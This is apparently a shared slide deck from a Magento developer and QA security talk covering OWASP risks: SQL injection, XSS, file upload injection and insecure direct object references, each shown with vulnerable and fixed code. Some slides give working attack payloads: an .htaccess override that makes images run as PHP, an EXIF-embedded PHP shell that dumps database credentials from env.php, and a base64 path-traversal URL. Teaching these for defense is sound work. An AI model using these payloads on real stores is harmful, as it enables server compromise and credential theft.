Magento Security from Developer's and Tester's Points of View
•
0 likes•3,571 views
This document provides an overview of common security vulnerabilities and best practices for securing Magento stores and applications. It begins with introductions of two Magento experts and their backgrounds. The document then discusses why security is important for online stores and outlines the top 10 vulnerabilities according to OWASP. The majority of the document dives into specific vulnerabilities like SQL injections, file injections, cross-site scripting, and insecure direct object references. For each vulnerability, it provides patterns, examples, and prevention techniques. It concludes with additional security best practices like checking extensions, installing patches, and validating all incoming data.
Recommended
Recommended
More Related Content
Similar to Magento Security from Developer's and Tester's Points of View
Similar to Magento Security from Developer's and Tester's Points of View (20)
More from Amasty
More from Amasty (20)
Recently uploaded
Recently uploaded (20)
Magento Security from Developer's and Tester's Points of View
- 2. Alexey Motorny 5+ years in Magento development All this time he’s been a proud member of Amasty team Took part in 50+ Magento 1 and Magento 2 projects Master of Science Magento Certified Developer
- 3. Valeria Shevtsova 5+ years of experience in testing Testing instructor Research degree in science Head of QA department
- 6. WHY SECURITY IS CRUCIAL Users’ personal data Commercial confidentiality Money Users’ trust FOR ONLINE STORES
- 7. VULNERABILITIES A1 – Injection A2 – Broken Authentication and Session Management A3 – Cross-site scripting A4 – Insecure direct object references A5 – Security Misconfiguration A6 – Sensitive Data Exposure A7 – Insufficient Attack Protection A8 – Cross-site Request Forgery (CSRF) A9 – Using Components with Known Vulnerabilities A10 – Underprotected APIs according to Open Web Application Security Project TOP 10
- 8. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
- 9. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
- 10. 10 1.1 SQL INJECTIONS: PATTERNS 1 2 3 4 Using GET POST variables without validation and processing $data = $model->getData(GET[‘field_name’]) Raw SQL queries, such as $sql = "INSERT INTO $table (attribute_id , store_id, $entityIdName, `value`) "; $db->query($sql); Building parameters of WHERE queries using concatenation $select->where(‘attribute_id = ’. $attributeId); Same goes to ->order() -> join() ->group() and other sql-functions
- 12. 1.1 SQL INJECTIONS THROUGH FORMS $userdata = $connection->fetchRow("SELECT firstname, lastname FROM admin_user WHERE username = '" . $observer->getUserName() . "'"); EXAMPLE 12
- 13. 13 RESULTS 1.1 SQL INJECTIONS THROUGH FORMS
- 14. 14 $userdata = Mage::getModel('admin/user') ->loadByUsername($observer->getUser()->getUsername()) ; 1.1 SQL INJECTIONS THROUGH FORMS PREVENTION AFTER BEFORE $userdata = $connection->fetchRow("SELECT firstname, lastname FROM admin_user WHERE username = '" . $observer ->getUserName() . "'");
- 15. 15 1.1 SQL INJECTIONS VIA URLS: PATTERNS
- 16. 16 $userName = Mage::app()->getCookie()->get('current_user'); $collection->getSelect()-where('username=' . $userName); 1.1 SQL INJECTIONS VIA COOKIES: PATTERNS AND IMPLEMENTATION
- 17. 17 $userName = Mage::app()->getCookie()->get('current_user'); $collection->getSelect()-where('username=?', $userName); PREVENTION AFTER BEFORE $userName = Mage::app()->getCookie()->get('current_user'); $collection->getSelect()-where('username=' . $userName); 1.1 SQL INJECTIONS VIA COOKIES
- 18. 18 1.1 SQL INJECTIONS VIA SYSTEM CONFIG DATA $query = $query . 'WHERE date_time < NOW() - INTERVAL ' . $days . ' DAY'; Mage::getSingleton('core/resource')->getConnection('core_write') ->query($query) ; PATTERNS AND IMPLEMENTATION
- 19. 19 PREVENTION 1.1 SQL INJECTIONS VIA SYSTEM CONFIG DATA $days = (int)$days; $query = "DELETE FROM `$tableLoginAttemptsName`"; $query = $query . 'WHERE date_time < NOW() - INTERVAL :days DAY'; Mage::getSingleton('core/resource')->getConnection('core_write')-> query( $query, array('days' => $days));
- 20. 20 1.2 FILE INJECTION: IMPLEMENTATION http://example.com/pub/media/customer/c/o/code.php ORDER DENY, ALLOW DENY FROM ALL
- 21. 21 1.2 FILE INJECTION: IMPLEMENTATION http://example.com/media/customer/_/h/.htaccess <IfModule mod_php5.c> php_flag engine 1 </IfModule> <IfModule mod_php7.c> php_flag engine 1 </IfModule> Order deny, allow deny from all http://example.comy/media/customer/_/h/.hcode.php
- 22. 22 1.2 FILE INJECTION: IMPLEMENTATION
- 23. 23 1.2 FILE INJECTION: PREVENTION 1 2 3 Forbid uploading PHP files. Block htaccess uploading Implement file uploading via Magento Uploader
- 24. 24 1.2 FILE INJECTION: IMAGE INJECTION EXAMPLE http://example.com/media/customer/_/h/.htaccess AddType application/x-httpd-php.jpg Order deny, allow deny from all jhead -ce apple.jpg <h1> <?php if (isset($_REQUEST['cmd'])) { $test = require_once ("../../../../../app/etc/env.php");var_dump($test["db"]); } else { echo '<img src="./.h-apple-orig.jpg" border=0>'; } ?> </h1>
- 25. 25 1.2 FILE/CODE INJECTION EXAMPLE http://example.com/pub/media/customer/_/h/.h-apple.jpg?cmd=test
- 26. 26 1.2 FILE/CODE INJECTION PREVENTION BEFORE $uploader = new Mage_Core_Model_File_Uploader( 'image'); if ($allowed = $this->getAllowedExtensions($type)) { $uploader->setAllowedExtensions($allowed); } $uploader->setAllowRenameFiles(true); $uploader->setFilesDispersion(false); $uploader->addValidateCallback (Mage_Core_Model_File_Validator_Image::NAME, Mage::getModel('core/file_validator_image'),'validate'); AFTER
- 27. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
- 28. 28 PATTERNS CONTROLLER $customData = $this->getRequest()->getParams(); $model->setCustomData($customData) $model->save(); 2. CROSS-SITE SCRIPTING VIEW <?php echo $model->getCustomData()?>
- 34. 34 PREVENTION 2. CROSS-SITE SCRIPTING $value = $this->helper->escapeHtml($value); public function escapeHtml($data, $allowedTags = null)
- 35. 35 ADMIN ACCESS 2. CROSS-SITE SCRIPTING
- 36. 36 ADMIN ACCESS 2. CROSS-SITE SCRIPTING
- 37. 37 ADMIN ACCESS 2. CROSS-SITE SCRIPTING
- 38. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
- 39. 39 3. INSECURE DIRECT OBJECT REFERENCES
- 40. 40 3. INSECURE DIRECT OBJECT REFERENCES REVEALING VULNERABILITIES $file = $this->getRequest()->getParam('file'); $fileName = CustomerMetadataInterface::ENTITY_TYPE_CUSTOMER.'/'. $file; ‘../../../app/etc/env.php’ /var/www/html/magento/pub/media/customer/../../../app/etc/env.php
- 41. 41 3. INSECURE DIRECT OBJECT REFERENCES FILE NAME REPLACEMENT http://example.com/amcustomerattr/index/viewfile/file/Li4vLi4vLi4vYXBwL2V0Yy9lb nYucGhw/customer_id/1/
- 42. 42 3. INSECURE DIRECT OBJECT REFERENCES RESULTS
- 43. 43 3. INSECURE DIRECT OBJECT REFERENCES PREVENTION $file = Uploader::getCorrectFileName($file); /** * Correct filename with special chars and spaces * * @param string $fileName * @return string */ public static function getCorrectFileName($fileName) { $fileName = preg_replace('/[^a-z0-9_-.]+/i', '_', $fileName); $fileInfo = pathinfo($fileName); if (preg_match('/^_+$/', $fileInfo['filename'])) { $fileName = 'file.' . $fileInfo['extension']; } return $fileName; }
- 44. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
- 45. 45 4. DIRECT LINK ACCESS EXAMPLES http://exmaple.com/media/customer/passport/1.jpg http://example.com/media/customer/passport/2.jpg PREVENTION http://example.com/amcustomerattr/index/viewfile/file/Li4vLi4vLi4vY XBwL2V0Yy9lbnYucGhw/customer_id/7dc4acc58270/
- 46. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
- 48. 48 MORE SECURITY STUFF 1 2 3 4 6 When buying extensions from Magento vendors, always pay attention to security questions Install security patches in time Use additional backend security measures Check if user and admin passwords are strong enough Use Security extensions Configure your servers for safety5
- 49. 49 DETECT VULNERABILITIES LIKE A BOSS 1 2 3 4 6 Look for unwanted access to users’ data via direct links Look for known patterns Check forms, URLs to prevent SQL and JavaScript injections Check user cookies Make sure admin area has no security holes Test files uploading via file upload inputs5
- 50. 50 TIPS ON WRITING SAFE APPLICATIONS FOR MAGENTO 1 2 3 4 6 Make sure your server environment is configured for safety Validate all the incoming data Data escaping is a must! Check extension for getting access to important files Data validation for API is a must Use Magento functions5
- 52. THANK YOU!